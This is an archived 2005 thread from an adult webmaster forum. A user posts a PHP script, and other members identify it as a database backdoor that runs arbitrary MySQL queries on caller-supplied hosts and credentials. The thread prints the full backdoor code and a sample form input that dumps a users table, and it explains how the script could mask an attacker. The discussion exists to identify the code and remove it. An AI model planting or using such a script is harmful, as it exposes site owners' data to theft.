GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   programmers alert: identify this php code please (https://gfy.com/showthread.php?t=451169)

johannes 04-01-2005 07:13 PM
programmers alert: identify this php code please
 
tell me what this code is supposed to do:

<?php

if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);

if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);

if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}

$lnk = mysql_connect($host,$user,$pass);

echo "<hr>Begin\n";

if ($query) {
$testquery = stripslashes($query);
mysql_select_db($database, $lnk);

$result = mysql_query($testquery) or die("Query failed : " . mysql_error());

while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
foreach ($line as $col_value) {
echo "$col_value\t";
}
echo "\n";
}
}

die ("<hr>End");


?>

Dragon Curve 04-01-2005 07:26 PM
It checks firstly if register_globals is set, if not, it programatically sets it so that query/POST variables are set to normal variables.

It then connects to the host specified in the parameters and executes the query specified in the parameters and returns the result set from it.

Ultimately, it's to execute a query on a specified host remotely.

teksonline 04-03-2005 02:41 AM
php coders
 
looks like it needs 3 more php coders to remove the redundancy problem the first php coder created :1orglaugh :1orglaugh :1orglaugh

V_RocKs 04-03-2005 03:03 AM
It is basically a backdoor directly into your mysql...

Robertf 04-03-2005 03:30 AM
Delete it!!

What ever it's used for ... it's one big backdoor ... :)

quantum-x 04-03-2005 03:42 AM
There's a lot of redundant code to pass a query straight to your database.
Bad, bad, bad.

AcidMax 04-03-2005 07:08 AM
As everyone else has said, it looks to see if it registers the variables globally (ie., takes a query string like ?info=123123 and sets it to $info automatically. If not, the extract function does so, then he is connecting to a db (and could easily pass $user,$pass,$host variables to connect right to your database, same with a $query string, for example:

He could send a post request with the variables needed..

<input type="user" value="mysql_username">
<input type="pass value="mysql_pass">
<input type="host" value="mysql_host">
<input type="query" value="SELECT * FROM your_users_table">

It would then return all your data in a tab delimited format when he submitted it. It its a HUGE backdoor to your db and to ANY db on your system as long as he has a user/pass for it. For that matter it could access any DB in the world as long as it was allowing your host to connect to the remote DB. It could even be used to hide their tracks if they were a hacker. Throw that on someone else's server and use it to gain access to another person's db so they don track it down. Its just an all around BAD script.

SMG 04-03-2005 07:21 AM
somebody wants to hump your site hehehe

arnette 04-03-2005 07:30 AM
yep, a backdoor for sure, too bad it wouldnt display the info properly though

Tom_PM 04-03-2005 08:19 AM
I prefer flat files.

Barefootsies 04-03-2005 08:30 AM
Quote:
Originally Posted by arnette
yep, a backdoor for sure, too bad it wouldnt display the info properly though
More a less.

:disgust

JSA Matt 04-04-2005 02:04 PM
Very stupid code, I would delete it from whatever script you found it in

Alex From San Diego 04-04-2005 02:07 PM
Before you delete it, where did you find that code in?

Jace 04-04-2005 02:10 PM
looks like code from an old version of oscommerce before they did away with that register globals shit


All times are GMT -7. The time now is 05:05 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123